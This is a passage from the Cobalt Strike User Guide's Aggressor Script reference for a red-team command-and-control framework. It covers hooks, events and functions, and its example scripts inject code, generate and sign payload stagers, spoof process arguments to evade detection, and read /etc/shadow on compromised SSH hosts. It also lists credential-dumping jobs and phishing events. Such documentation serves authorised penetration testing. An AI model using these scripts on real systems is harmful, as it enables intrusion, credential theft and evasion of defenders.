+$entry = "go $+ $5";
+beacon_inline_execute($1, $data, $entry, $args);
+# Let the caller know the hook was implemented.
+return 1;
+}
+PROCESS_INJECT_SPAWN
+Hooktoallowuserstodefinehowtheforkandrunprocessinjectiontechniqueisimplemented
+whenexecutingpostexploitationcommandsusingaBeaconObjectFile(BOF).
+Arguments
+$1 -BeaconID
+$2 -memoryinjectabledll(position-independentcode)
+$3 -true/falseignoreprocesstoken
+$4 -x86/x64-memoryinjectableDLLarch
+CobaltStrikeUserGuide www.fortra.com page:233
+
+AggressorScript/Hooks
+Returns
+Returnanonemptyvaluewhendefiningyourownforkandrunprocessinjectiontechnique.
+Return$nulltousethedefaultforkandruninjectiontechnique.
+PostExploitationJobs
+ThefollowingpostexploitationcommandssupportthePROCESS_INJECT_SPAWNhook.The
+CommandcolumndisplaysthecommandtobeusedintheBeaconwindow,TheAggressor
+Scriptcolumndisplaystheaggressorscriptfunctiontobeusedinscripts,andtheUIcolumn
+displayswhichmenuoptiontouse.
+AdditionalInformation
+l
+Theelevate,runasadmin,&belevate,&brunasadmin and[beacon] -> Access ->
+Elevate commandswillonlyusethePROCESS_INJECT_SPAWNhookwhenthe
+specifiedexploitusesoneofthelistedaggressorscriptfunctionsinthetable,for
+example&bpowerpick.
+l Forthenet and&bnet commandthe‘domain’commandwillnotusethehook.
+l The‘(useahash)’notemeansselectacredentialthatreferencesahash.
+JobTypes
+Command Aggressor Script UI
+chromedump
+dcsync &bdcsync
+elevate &belevate [beacon]->Access->Elevate
+[beacon]->Access->GoldenTicket
+hashdump &bhashdump [beacon]->Access->DumpHashes
+keylogger &bkeylogger
+logonpasswords &blogonpasswords [beacon]->Access->RunMimikatz
+[beacon]->Access->MakeToken(usea
+hash)
+mimikatz &bmimikatz
+&bmimikatz_small
+CobaltStrikeUserGuide www.fortra.com page:234
+
+AggressorScript/Hooks
+Command Aggressor Script UI
+net &bnet [beacon]->Explore->NetView
+portscan &bportscan [beacon]->Explore->PortScan
+powerpick &bpowerpick
+printscreen &bprintscreen
+pth &bpassthehash
+runasadmin &brunasadmin
+[target]->Scan
+screenshot &bscreenshot [beacon]->Explore->Screenshot
+screenwatch &bscreenwatch
+ssh &bssh [target]->Jump->ssh
+ssh-key &bssh_key [target]->Jump->ssh-key
+[target]->Jump->[exploit](useahash)
+Example
+# ------------------------------------
+# $1 = Beacon ID
+# $2 = memory injectable dll (position-independent code)
+# $3 = true/false ignore process token
+# $4 = x86/x64 - memory injectable DLL arch
+# ------------------------------------
+set PROCESS_INJECT_SPAWN {
+local('$barch $handle $data $args $entry');
+# Set the architecture for the beacon's session
+$barch = barch($1);
+# read in the injection BOF based on barch
+warn("read the BOF: inject_spawn. $+ $barch $+ .o");
+$handle = openf(script_resource("inject_spawn. $+ $barch $+ .o"));
+$data = readb($handle, -1);
+closef($handle);
+# pack our arguments needed for the BOF
+$args = bof_pack($1, "sb", $3, $2);
+btask($1, "Process Inject using fork and run");
+# Set the entry point based on the dll's arch
+$entry = "go $+ $4";
+CobaltStrikeUserGuide www.fortra.com page:235
+
+AggressorScript/Hooks
+beacon_inline_execute($1, $data, $entry, $args);
+# Let the caller know the hook was implemented.
+return 1;
+}
+PSEXEC_SERVICE
+Settheservicenameusedbyjumppsexec|psexec64|psexec_pshandpsexec.
+Example
+set PSEXEC_SERVICE {
+return "foobar";
+}
+PYTHON_COMPRESS
+CompressaPythonscriptgeneratedbyCobaltStrike.
+Arguments
+$1-thescripttocompress
+ResourceKit
+ThishookisdemonstratedintheThe Resource Kit on page 92.
+Example
+set PYTHON_COMPRESS {
+return "import base64; exec base64.b64decode(\"" . base64_encode($1) .
+"\")";
+}
+RESOURCE_GENERATOR
+ControltheformatoftheVBStemplateusedinCobaltStrike.
+ResourceKit
+CobaltStrikeUserGuide www.fortra.com page:236
+
+AggressorScript/Hooks
+ThishookisdemonstratedintheThe Resource Kit on page 92.
+Arguments
+$1-theshellcodetoinjectandrun
+RESOURCE_GENERATOR_VBS
+ControlsthecontentoftheHTMLApplicationUser-driven(EXEOutput)generatedbyCobalt
+Strike.
+Arguments
+$1-theEXEdata
+$2-thenameofthe.exe
+ResourceKit
+ThishookisdemonstratedintheThe Resource Kit on page 92.
+Example
+set HTMLAPP_EXE {
+local('$handle $data');
+$handle = openf(script_resource("template.exe.hta"));
+$data = readb($handle, -1);
+closef($handle);
+$data = strrep($data, '##EXE##', transform($1, "hex"));
+$data = strrep($data, '##NAME##', $2);
+return $data;
+}
+SIGNED_APPLET_MAINCLASS
+SpecifyaJavaAppletfiletousefortheJavaSignedAppletAttack.SeeJava Signed Applet
+Attack on page 80.
+AppletKit
+CobaltStrikeUserGuide www.fortra.com page:237
+
+AggressorScript/Hooks
+ThishookisdemonstratedintheAppletKit.TheAppletKitisavailableviatheCobaltStrike
+Arsenal(Help->Arsenal).
+Example
+set SIGNED_APPLET_MAINCLASS {
+return "Java.class";
+}
+SIGNED_APPLET_RESOURCE
+SpecifyaJavaAppletfiletousefortheJavaSignedAppletAttack.SeeJava Signed Applet
+Attack on page 80.
+AppletKit
+ThishookisdemonstratedintheAppletKit.TheAppletKitisavailableviatheCobaltStrike
+Arsenal(Help->Arsenal).
+Example
+set SIGNED_APPLET_RESOURCE {
+return script_resource("dist/applet_signed.jar");
+}
+SMART_APPLET_MAINCLASS
+SpecifytheMAINclassoftheJavaSmartAppletAttack.SeeJava Smart Applet Attack on
+page 81.
+AppletKit
+ThishookisdemonstratedintheAppletKit.TheAppletKitisavailableviatheCobaltStrike
+Arsenal(Help->Arsenal).
+Example
+set SMART_APPLET_MAINCLASS {
+return "Java.class";
+}
+CobaltStrikeUserGuide www.fortra.com page:238
+
+AggressorScript/Events
+SMART_APPLET_RESOURCE
+SpecifyaJavaAppletfiletousefortheJavaSmartAppletAttack.SeeJava Smart Applet
+Attack on page 81.
+AppletKit
+ThishookisdemonstratedintheAppletKit.TheAppletKitisavailableviatheCobaltStrike
+Arsenal(Help->Arsenal).
+Example
+set SMART_APPLET_RESOURCE {
+return script_resource("dist/applet_rhino.jar");
+}
+Events
+ThesearetheeventsfiredbyAggressorScript.
+*
+ThiseventfireswheneveranyAggressorScripteventfires.
+Arguments
+$1-theoriginaleventname
+...-theargumentstotheevent
+Example
+# event spy script
+on * {
+println("[ $+ $1 $+ ]: " . subarray(@_, 1));
+}
+beacon_checkin
+CobaltStrikeUserGuide www.fortra.com page:239
+
+AggressorScript/Events
+FiredwhenaBeaconcheckinacknowledgementispostedtoaBeacon'sconsole.
+Arguments
+$1-theIDofthebeacon
+$2-thetextofthemessage
+$3-whenthismessageoccurred
+beacon_error
+FiredwhenanerrorispostedtoaBeacon'sconsole.
+Arguments
+$1-theIDofthebeacon
+$2-thetextofthemessage
+$3-whenthismessageoccurred
+beacon_indicator
+FiredwhenanindicatorofcompromisenoticeispostedtoaBeacon'sconsole.
+Arguments
+$1-theIDofthebeacon
+$2-theuserresponsiblefortheinput
+$3-thetextofthemessage
+$4-whenthismessageoccurred
+beacon_initial
+FiredwhenaBeaconcallshomeforthefirsttime.
+Arguments
+CobaltStrikeUserGuide www.fortra.com page:240
+
+AggressorScript/Events
+$1-theIDofthebeaconthatcalledhome.
+Example
+on beacon_initial {
+# list network connections
+bshell($1, "netstat -na | findstr \"ESTABLISHED\"");
+# list shares
+bshell($1, "net use");
+# list groups
+bshell($1, "whoami /groups");
+}
+beacon_initial_empty
+FiredwhenaDNSBeaconcallshomeforthefirsttime.Atthispoint,nometadatahasbeen
+exchanged.
+Arguments
+$1-theIDofthebeaconthatcalledhome.
+Example
+on beacon_initial_empty {
+binput($1, "[Acting on new DNS Beacon]");
+# change the data channel to DNS TXT
+bmode($1, "dns-txt");
+# request the Beacon checkin and send its metadata
+bcheckin($1);
+}
+beacon_input
+FiredwhenaninputmessageispostedtoaBeacon'sconsole.
+Arguments
+CobaltStrikeUserGuide www.fortra.com page:241
+
+AggressorScript/Events
+$1-theIDofthebeacon
+$2-theuserresponsiblefortheinput
+$3-thetextofthemessage
+$4-whenthismessageoccurred
+beacon_mode
+FiredwhenamodechangeacknowledgementispostedtoaBeacon'sconsole.
+Arguments
+$1-theIDofthebeacon
+$2-thetextofthemessage
+$3-whenthismessageoccurred
+beacon_output
+FiredwhenoutputispostedtoaBeacon'sconsole.
+Arguments
+$1-theIDofthebeacon
+$2-thetextofthemessage
+$3-whenthismessageoccurred
+beacon_output_alt
+Firedwhen(alternate)outputispostedtoaBeacon'sconsole.Whatmakesforalternateoutput?
+It'sjustdifferentpresentationfromnormaloutput.
+Arguments
+$1-theIDofthebeacon
+$2-thetextofthemessage
+CobaltStrikeUserGuide www.fortra.com page:242
+
+AggressorScript/Events
+$3-whenthismessageoccurred
+beacon_output_jobs
+FiredwhenjobsoutputissenttoaBeacon'sconsole.
+Arguments
+$1-theIDofthebeacon
+$2-thetextofthejobsoutput
+$3-whenthismessageoccurred
+beacon_output_ls
+FiredwhenlsoutputissenttoaBeacon'sconsole.
+Arguments
+$1-theIDofthebeacon
+$2-thetextofthelsoutput
+$3-whenthismessageoccurred
+beacon_output_ps
+FiredwhenpsoutputissenttoaBeacon'sconsole.
+Arguments
+$1-theIDofthebeacon
+$2-thetextofthepsoutput
+$3-whenthismessageoccurred
+beacon_tasked
+FiredwhenataskacknowledgementispostedtoaBeacon'sconsole.
+CobaltStrikeUserGuide www.fortra.com page:243
+
+AggressorScript/Events
+Arguments
+$1-theIDofthebeacon
+$2-thetextofthemessage
+$3-whenthismessageoccurred
+beacons
+FiredwhentheteamserversendsoverfreshinformationonallofourBeacons.Thisoccurs
+aboutonceeachsecond.
+Arguments
+$1-anarrayofdictionaryobjectswithmetadataforeachBeacon.
+custom_event_
+Firedwhenaclientreceivesacustomeventfromanotherclient.
+Arguments
+$1-whosentthecustomevent
+$2-theeventdata
+$3-thetimetheeventwassent
+Example
+# subscribe to the my-topic custom event
+on "custom_event_my-topic" {
+println("Received my-topic:")
+println("\tSender: $1");
+println("\tData: $2");
+println("\tTimestamp: $3");
+}
+disconnect
+CobaltStrikeUserGuide www.fortra.com page:244
+
+AggressorScript/Events
+FiredwhenthisCobaltStrikebecomesdisconnectedfromtheteamserver.
+event_action
+Firedwhenauserperformsanactionintheeventlog.ThisissimilartoanactiononIRC(the
+/mecommand)
+Arguments
+$1-whothemessageisfrom
+$2-thecontentsofthemessage
+$3-thetimethemessagewasposted
+event_beacon_initial
+Firedwhenaninitialbeaconmessageispostedtotheeventlog.
+Arguments
+$1-thecontentsofthemessage
+$2-thetimethemessagewasposted
+event_join
+Firedwhenauserconnectstotheteamserver
+Arguments
+$1-whojoinedtheteamserver
+$2-thetimethemessagewasposted
+event_newsite
+Firedwhenanewsitemessageispostedtotheeventlog.
+Arguments
+CobaltStrikeUserGuide www.fortra.com page:245
+
+AggressorScript/Events
+$1-whosetupthenewsite
+$2-thecontentsofthenewsitemessage
+$3-thetimethemessagewasposted
+event_notify
+Firedwhenamessagefromtheteamserverispostedtotheeventlog.
+Arguments
+$1-thecontentsofthemessage
+$2-thetimethemessagewasposted
+event_nouser
+FiredwhenthecurrentCobaltStrikeclienttriestointeractwithauserwhoisnotconnectedto
+theteamserver.
+Arguments
+$1-whoisnotpresent
+$2-thetimethemessagewasposted
+event_private
+Firedwhenaprivatemessageispostedtotheeventlog.
+Arguments
+$1-whothemessageisfrom
+$2-whothemessageisdirectedto
+$3-thecontentsofthemessage
+$4-thetimethemessagewasposted
+CobaltStrikeUserGuide www.fortra.com page:246
+
+AggressorScript/Events
+event_public
+Firedwhenapublicmessageispostedtotheeventlog.
+Arguments
+$1-whothemessageisfrom
+$2-thecontentsofthemessage
+$3-thetimethemessagewasposted
+event_quit
+Firedwhensomeonedisconnectsfromtheteamserver.
+Arguments
+$1-wholefttheteamserver
+$2-thetimethemessagewasposted
+heartbeat_10m
+Firedeverytenminutes
+heartbeat_10s
+Firedeverytenseconds
+heartbeat_15m
+Firedeveryfifteenminutes
+heartbeat_15s
+Firedeveryfifteenseconds
+CobaltStrikeUserGuide www.fortra.com page:247
+
+AggressorScript/Events
+heartbeat_1m
+Firedeveryminute
+heartbeat_1s
+Firedeverysecond
+heartbeat_20m
+Firedeverytwentyminutes
+heartbeat_30m
+Firedeverythirtyminutes
+heartbeat_30s
+Firedeverythirtyseconds
+heartbeat_5m
+Firedeveryfiveminutes
+heartbeat_5s
+Firedeveryfiveseconds
+heartbeat_60m
+Firedeverysixtyminutes
+keylogger_hit
+Firedwhentherearenewresultsreportedtothewebserverviatheclonedsitekeystrokelogger.
+Arguments
+CobaltStrikeUserGuide www.fortra.com page:248
+
+AggressorScript/Events
+$1-externaladdressofvisitor
+$2-reserved
+$3-theloggedkeystrokes
+$4-thephishingtokenfortheserecordedkeystrokes.
+keystrokes
+FiredwhenCobaltStrikereceiveskeystrokes
+Arguments
+$1-adictionarywithinformationaboutthekeystrokes.
+Key Value
+bid BeaconIDforsessionkeystrokesoriginatedfrom
+data keystrokedatareportedinthisbatch
+id identifierforthiskeystrokebuffer
+session desktopsessionfromkeystrokelogger
+title lastactivewindowtitlefromkeystrokelogger
+user usernamefromkeystrokelogger
+when timestampofwhentheseresultsweregenerated
+Example
+on keystrokes {
+if ("*Admin*" iswm $1["title"]) {
+blog($1["bid"], "Interesting keystrokes received.
+Go to \c4View -> Keystrokes\o and look for the green buffer.");
+highlight("keystrokes", @($1), "good");
+}
+}
+profiler_hit
+FiredwhentherearenewresultsreportedtotheSystemProfiler.
+CobaltStrikeUserGuide www.fortra.com page:249
+
+AggressorScript/Events
+Arguments
+$1-externaladdressofvisitor
+$2-de-cloakedinternaladdressofvisitor(or"unknown")
+$3-visitor'sUser-Agent
+$4-adictionarycontainingtheapplications.
+$5-thephishingtokenofthevisitor(use&tokenToEmailtoresolvetoanemailaddress)
+ready
+FiredwhenthisCobaltStrikeclientisconnectedtotheteamserverandreadytoact.
+screenshots
+FiredwhenCobaltStrikereceivesascreenshot.
+Arguments
+$1-adictionarywithinformationaboutthescreenshot.
+Key Value
+bid BeaconIDforsessionscreenshotoriginatedfrom
+data rawscreenshotdata(thisisa.jpgfile)
+id identifierforthisscreenshot
+session desktopsessionreportedbyscreenshottool
+title activewindowtitlefromscreenshottool
+user usernamefromscreenshottool
+when timestampofwhenthisscreenshotwasreceived
+Example
+# watch for any screenshots where someone is banking and
+# redact it from the user-interface.
+on screenshots {
+CobaltStrikeUserGuide www.fortra.com page:250
+
+AggressorScript/Events
+local('$title');
+$title = lc($1["title"]);
+if ("*bankofamerica*" iswm $title) {
+redactobject($1["id"]);
+}
+else if ("jpmc*" iswm $title) {
+redactobject($1["id"]);
+}
+}
+sendmail_done
+Firedwhenaphishingcampaigncompletes
+Arguments
+$1-thecampaignID
+sendmail_post
+Firedafteraphishissenttoanemailaddress.
+Arguments
+$1-thecampaignID
+$2-theemailwe'resendingaphishto
+$3-thestatusofthephish(e.g.,SUCCESS)
+$4-themessagefromthemailserver
+sendmail_pre
+Firedbeforeaphishissenttoanemailaddress.
+Arguments
+$1-thecampaignID
+$2-theemailwe'resendingaphishto
+CobaltStrikeUserGuide www.fortra.com page:251
+
+AggressorScript/Events
+sendmail_start
+Firedwhenanewphishingcampaignkicksoff.
+Arguments
+$1-thecampaignID
+$2-numberoftargets
+$3-localpathtoattachment
+$4-thebouncetoaddress
+$5-themailserverstring
+$6-thesubjectofthephishingemail
+$7-thelocalpathtothephishingtemplate
+$8-theURLtoembedintothephish
+ssh_checkin
+FiredwhenanSSHclientcheckinacknowledgementispostedtoanSSHconsole.
+Arguments
+$1-theIDofthesession
+$2-thetextofthemessage
+$3-whenthismessageoccurred
+ssh_error
+FiredwhenanerrorispostedtoanSSHconsole.
+Arguments
+$1-theIDofthesession
+CobaltStrikeUserGuide www.fortra.com page:252
+
+AggressorScript/Events
+$2-thetextofthemessage
+$3-whenthismessageoccurred
+ssh_indicator
+FiredwhenanindicatorofcompromisenoticeispostedtoanSSHconsole.
+Arguments
+$1-theIDofthesession
+$2-theuserresponsiblefortheinput
+$3-thetextofthemessage
+$4-whenthismessageoccurred
+ssh_initial
+FiredwhenanSSHsessionisseenforthefirsttime.
+Arguments
+$1-theIDofthesession
+Example
+on ssh_initial {
+if (-isadmin $1) {
+bshell($1, "cat /etc/shadow");
+}
+}
+ssh_input
+FiredwhenaninputmessageispostedtoanSSHconsole.
+Arguments
+$1-theIDofthesession
+CobaltStrikeUserGuide www.fortra.com page:253
+
+AggressorScript/Events
+$2-theuserresponsiblefortheinput
+$3-thetextofthemessage
+$4-whenthismessageoccurred
+ssh_output
+FiredwhenoutputispostedtoanSSHconsole.
+Arguments
+$1-theIDofthesession
+$2-thetextofthemessage
+$3-whenthismessageoccurred
+ssh_output_alt
+Firedwhen(alternate)outputispostedtoanSSHconsole.Whatmakesforalternateoutput?It's
+justdifferentpresentationfromnormaloutput.
+Arguments
+$1-theIDofthesession
+$2-thetextofthemessage
+$3-whenthismessageoccurred
+ssh_tasked
+FiredwhenataskacknowledgementispostedtoanSSHconsole.
+Arguments
+$1-theIDofthesession
+$2-thetextofthemessage
+$3-whenthismessageoccurred
+CobaltStrikeUserGuide www.fortra.com page:254
+
+AggressorScript/Functions
+web_hit
+Firedwhenthere'sanewhitonCobaltStrike'swebserver.
+Arguments
+$1-themethod(e.g.,GET,POST)
+$2-therequestedURI
+$3-thevisitor'saddress
+$4-thevisitor'sUser-Agentstring
+$5-thewebserver'sresponsetothehit(e.g.,200)
+$6-thesizeofthewebserver'sresponse
+$7-adescriptionofthehandlerthatprocessedthishit.
+$8-adictionarycontainingtheparameterssenttothewebserver
+$9-thetimewhenthehittookplace.
+Functions
+ThisisalistofAggressorScript'sfunctions.
+QuickJump
+A|B|C |D |E |F |G |H|I|J |K |L|M|N |O|P|Q|R |S |T |U |W |X|Y |Z
+-hasbootstraphint
+Checkifabytearrayhasthex86orx64bootstraphint.Usethisfunctiontodetermineifit'ssafe
+touseanartifactthatpassesGetProcAddress/GetModuleHandleApointerstothispayload.
+Arguments
+$1-bytearraywithapayloadorshellcode.
+CobaltStrikeUserGuide www.fortra.com page:255
+
+AggressorScript/Functions
+Seealso
+&payload_bootstrap_hint
+-is64
+Checkifasessionisonanx64systemornot(Beacononly).
+Arguments
+$1-Beacon/SessionID
+Example
+command x64 {
+foreach $session (beacons()) {
+if (-is64 $session['id']) {
+println($session);
+}
+}
+}
+-isactive
+Checkifasessionisactiveornot.Asessionisconsideredactiveif(a)ithasnotacknowledged
+anexitmessageAND(b)itisnotdisconnectedfromaparentBeacon.
+Arguments
+$1-Beacon/SessionID
+Example
+command active {
+local('$bid');
+foreach $bid (beacon_ids()) {
+if (-isactive $bid) {
+println("$bid is active!");
+}
+}
+}
+CobaltStrikeUserGuide www.fortra.com page:256
+
+AggressorScript/Functions
+-isadmin
+Checkifasessionhasadminrights
+Arguments
+$1-Beacon/SessionID
+Example
+command admin_sessions {
+foreach $session (beacons()) {
+if (-isadmin $session['id']) {
+println($session);
+}
+}
+}
+-isbeacon
+CheckifasessionisaBeaconornot.
+Arguments
+$1-Beacon/SessionID
+Example
+command beacons {
+foreach $session (beacons()) {
+if (-isbeacon $session['id']) {
+println($session);
+}
+}
+}
+-isssh
+CheckifasessionisanSSHsessionornot.
+Arguments
+CobaltStrikeUserGuide www.fortra.com page:257
+
+AggressorScript/Functions
+$1-Beacon/SessionID
+Example
+command ssh_sessions {
+foreach $session (beacons()) {
+if (-isssh $session['id']) {
+println($session);
+}
+}
+}
+action
+Postapublicactionmessagetotheeventlog.Thisissimilartothe/mecommand.
+Arguments
+$1-themessage
+Example
+action("dances!");
+addTab
+CreateatabtodisplayaGUIobject.
+Arguments
+$1-thetitleofthetab
+$2-aGUIobject.AGUIobjectisonethatisaninstanceofjavax.swing.JComponent.
+$3-atooltiptodisplaywhenauserhoversoverthistab.
+Example
+$label = [new javax.swing.JLabel: "Hello World"];
+addTab("Hello!", $label, "this is an example");
+CobaltStrikeUserGuide www.fortra.com page:258
+
+AggressorScript/Functions
+addVisualization
+RegisteravisualizationwithCobaltStrike.
+Arguments
+$1-thenameofthevisualization
+$2-ajavax.swing.JComponentobject
+Example
+$label = [new javax.swing.JLabel: "Hello World!"];
+addVisualization("Hello World", $label);
+Seealso
+&showVisualization
+add_to_clipboard
+Addtexttotheclipboard,notifytheuser.
+Arguments
+$1-thetexttoaddtotheclipboard
+Example
+add_to_clipboard("Paste me you fool!");
+alias
+CreatesanaliascommandintheBeaconconsole
+Arguments
+$1-thealiasnametobindto
+CobaltStrikeUserGuide www.fortra.com page:259
+
+AggressorScript/Functions
+$2-acallbackfunction.Calledwhentheuserrunsthealias.Argumentsare:$0=commandrun,
+$1=beaconid,$2=arguments.
+Example
+alias("foo", {
+btask($1, "foo!");
+});
+alias_clear
+Removesanaliascommand(andrestoresdefaultfunctionality;ifitexisted)
+Arguments
+$1-thealiasnametoremove
+Example
+alias_clear("foo");
+all_payloads
+Generatesallofthestagelesspayloads(inx86andx64)foralloftheconfiguredlisteners.(also
+availableintheUImenuunderPayloads -> Windows Stageless Generate all Payloads)
+Arguments
+$1-Thefolderpathtocreatethepayloadsin.
+$2-Abooleanvalueforwhethertheexecutablefilesshouldbesigned.
+$3–Astringvalueforthesystemcallmethod.Validvaluesare:
+None:UsethestandardWindowsAPIfunction.
+Direct:UsetheNt*versionofthefunction.
+Indirect:JumptotheappropriateinstructionwithintheNt*versionofthefunction.
+CobaltStrikeUserGuide www.fortra.com page:260
+
+AggressorScript/Functions
+$4-(optional)ThesupportingHTTPlibraryforgeneratedbeacons(wininet|winhttp|$null|blank
+string).
+Example
+$folder = all_payloads "/tmp/payloads", 1, "None");
+println("Payloads have been saved to $folder");
+applications
+ReturnsalistofapplicationinformationinCobaltStrike'sdatamodel.Theseapplicationsare
+resultsfromtheSystemProfiler.
+Returns
+Anarrayofdictionaryobjectswithinformationabouteachapplication.
+Example
+printAll(applications());
+archives
+ReturnsamassivelistofarchivedinformationaboutyouractivityfromCobaltStrike'sdata
+model.ThisinformationisleanedonheavilytoreconstructyouractivitytimelineinCobalt
+Strike'sreports.
+Returns
+Anarrayofdictionaryobjectswithinformationaboutyourteam'sactivity.
+Example
+foreach $index => $entry (archives()) {
+println("\c3( $+ $index $+ )\o $entry");
+}
+artifact
+CobaltStrikeUserGuide www.fortra.com page:261
+
+AggressorScript/Functions
+DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_stager
+instead.
+Generatesastagerartifact(exe,dll)fromaCobaltStrikelistener
+Arguments
+$1-thelistenername
+$2-theartifacttype
+$3-deprecated;thisparameternolongerhasanymeaning.
+$4-x86|x64-thearchitectureofthegeneratedstager
+Type Description
+dll anx86DLL
+dllx64 anx64DLL
+exe aplainexecutable
+powershell apowershellscript
+python apythonscript
+svcexe aserviceexecutable
+vbscript aVisualBasicscript
+Note
+Beawarethatnotalllistenerconfigurationshavex64stagers.Ifindoubt,usex86.
+Returns
+Ascalarcontainingthespecifiedartifact.
+Example
+$data = artifact("my listener", "exe");
+$handle = openf(">out.exe");
+writeb($handle, $data);
+closef($handle);
+CobaltStrikeUserGuide www.fortra.com page:262
+
+AggressorScript/Functions
+artifact_general
+Generatesapayloadartifactfromarbitraryshellcode.
+Arguments
+$1-theshellcode
+$2-theartifacttype
+$3-x86|x64-thearchitectureofthegeneratedpayload
+Type Description
+dll aDLL
+exe aplainexecutable
+powershell apowershellscript
+python apythonscript
+svcexe aserviceexecutable
+Note
+WhilethePythonartifactinCobaltStrikeisdesignedtosimultaneouslycarryanx86andx64
+payload;thisfunctionwillonlypopulatethescriptwiththearchitectureargumentspecifiedas
+$3
+artifact_payload
+Generatesastagelesspayloadartifact(exe,dll)fromaCobaltStrikelistenername
+Arguments
+$1-thelistenername
+$2-theartifacttype
+$3-x86|x64-thearchitectureofthegeneratedpayload(stage)
+$4-exitmethod:'thread'(leavethethreadwhendone)or'process'(exittheprocesswhen
+done).Use'thread'ifinjectingintoanexistingprocess.
+CobaltStrikeUserGuide www.fortra.com page:263
+
+AggressorScript/Functions
+$5–Astringvalueforthesystemcallmethod.Validvaluesare:
+None:UsethestandardWindowsAPIfunction.
+Direct:UsetheNt*versionofthefunction.
+Indirect:JumptotheappropriateinstructionwithintheNt*versionofthefunction.
+Type Description
+dll aDLL
+exe aplainexecutable
+powershell apowershellscript
+python apythonscript
+raw rawpayloadstage
+svcexe aserviceexecutable
+$6-(optional)ThesupportingHTTPlibraryforgeneratedbeacons(wininet|winhttp|$null|blank
+string).
+Note
+WhilethePythonartifactinCobaltStrikeisdesignedtosimultaneouslycarryanx86andx64
+payload;thisfunctionwillonlypopulatethescriptwiththearchitectureargumentspecifiedas
+$3
+Example
+$data = artifact_payload("my listener", "exe", "x86", “process”,
+“Indirect”);
+artifact_sign
+SignanEXEorDLLfile
+Arguments
+$1-thecontentsoftheEXEorDLLfiletosign
+Notes
+CobaltStrikeUserGuide www.fortra.com page:264
+
+AggressorScript/Functions
+l Thisfunctionrequiresthatacode-signingcertificateisspecifiedinthisserver's
+MalleableC2profile.Ifnocode-signingcertificateisconfigured,thisfunctionwillreturn
+$1withnochanges.
+l DO NOTsignanexecutableorDLLtwice.ThelibraryCobaltStrikeusesforcode-signing
+willcreateaninvalid(second)signatureiftheexecutableorDLLisalreadysigned.
+Returns
+Ascalarcontainingthesignedartifact.
+Example
+# generate an artifact!
+$data = artifact("my listener", "exe");
+# sign it.
+$data = artifact_sign($data);
+# save it
+$handle = openf(">out.exe");
+writeb($handle, $data);
+closef($handle);
+artifact_stageless
+DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_payload
+instead.
+Generatesastagelessartifact(exe,dll)froma(local)CobaltStrikelistener
+Arguments
+$1-thelistenername(mustbelocaltothisteamserver)
+$2-theartifacttype
+$3-x86|x64-thearchitectureofthegeneratedpayload(stage)
+$4-proxyconfigurationstring
+$5-callbackfunction.Thisfunctioniscalledwhentheartifactisready.The$1argumentisthe
+stagelesscontent.
+CobaltStrikeUserGuide www.fortra.com page:265
+
+AggressorScript/Functions
+Type Description
+dll anx86DLL
+dllx64 anx64DLL
+exe aplainexecutable
+powershell apowershellscript
+python apythonscript
+raw rawpayloadstage
+svcexe aserviceexecutable
+Notes
+l Thisfunctionprovidesthestagelessartifactviaacallbackfunction.Thisisnecessary
+becauseCobaltStrikegeneratespayloadstagesontheteam server.
+l TheproxyconfigurationstringisthesamestringyouwouldusewithPayloads ->
+Windows Stageless Payload.*direct*ignoresthelocalproxyconfigurationand
+attemptsadirectconnection.protocol://user:[email protected]:port
+specifieswhichproxyconfigurationtheartifactshoulduse.Theusernameand
+passwordareoptional(e.g.,protocol://host:portisfine).Theacceptable
+protocolsaresocksandhttp.Settheproxyconfigurationstringto$nullor""touse
+thedefaultbehavior.Custom dialogsmayuse&drow_proxyservertosetthis.
+l Thisfunctioncannotgenerateartifactsforlistenersonotherteam servers.Thisfunction
+alsocannotgenerateartifactsforforeignlisteners.Limityouruseofthisfunctionto
+locallisterswithstagesonly.Custom dialogsmayuse&drow_listener_stagetochoose
+anacceptablelistenerforthisfunction.
+l Note:whilethePythonartifactinCobaltStrikeisdesignedtosimultaneouslycarryan
+x86andx64payload;thisfunctionwillonlypopulatethescriptwiththearchitecture
+argumentspecifiedas$3
+Example
+sub ready {
+local('$handle');
+$handle = openf(">out.exe");
+writeb($handle, $1);
+closef($handle);
+}
+artifact_stageless("my listener", "exe", "x86", "", &ready);
+CobaltStrikeUserGuide www.fortra.com page:266
+
+AggressorScript/Functions
+artifact_stager
+Generatesastagerartifact(exe,dll)fromaCobaltStrikelistener
+Arguments
+$1-thelistenername
+$2-theartifacttype
+$3-x86|x64-thearchitectureofthegeneratedstager
+Type Description
+dll aDLL
+exe aplainexecutable
+powershell apowershellscript
+python apythonscript
+raw therawfile
+svcexe aserviceexecutable
+vbscript aVisualBasicscript
+Note
+Beawarethatnotalllistenerconfigurationshavex64stagers.Ifindoubt,usex86.
+Returns
+Ascalarcontainingthespecifiedartifact.
+Example
+$data = artifact_stager("my listener", "exe", "x86");
+$handle = openf(">out.exe");
+writeb($handle, $data);
+closef($handle);
+barch
+CobaltStrikeUserGuide www.fortra.com page:267
+
+AggressorScript/Functions
+ReturnsthearchitectureofyourBeaconsession(e.g.,x86orx64)
+Arguments
+$1-theidforthebeacontopullmetadatafor
+Note
+Ifthearchitectureisunknown(e.g.,aDNSBeaconthathasn'tsentmetadatayet);thisfunction
+willreturnx86.
+Example
+println("Arch is: " . barch($1));
+bargue_add
+ThisfunctionaddsanoptiontoBeacon'slistofcommandstospoofargumentsfor.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thecommandtospoofargumentsfor.EnvironmentvariablesareOKheretoo.
+$3-thefakeargumentstousewhenthespecifiedcommandisrun.
+Notes
+l Theprocessmatchisexact.IfBeacontriestolaunch"net.exe",itwillnotmatchnet,
+NET.EXE,orc:\windows\system32\net.exe.Itwillonlymatchnet.exe.
+l x86Beaconcanonlyspoofargumentsinx86childprocesses.Likewise,x64Beaconcan
+onlyspoofargumentsinx64childprocesses.
+l Therealargumentsarewrittentothememoryspacethatholdsthefakearguments.If
+therealargumentsarelongerthanthefakearguments,thecommandlaunchwillfail.
+Example
+# spoof cmd.exe arguments.
+bargue_add($1, "%COMSPEC%", "/K \"cd c:\windows\temp & startupdatenow.bat\"");
+CobaltStrikeUserGuide www.fortra.com page:268
+
+AggressorScript/Functions
+# spoof net arguments
+bargue_add($1, "net", "user guest /active:no");
+bargue_list
+Listthecommands+fakeargumentsBeaconwillspoofargumentsfor.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+Example
+bargue_list($1);
+bargue_remove
+ThisfunctionremovesanoptiontoBeacon'slistofcommandstospoofargumentsfor.
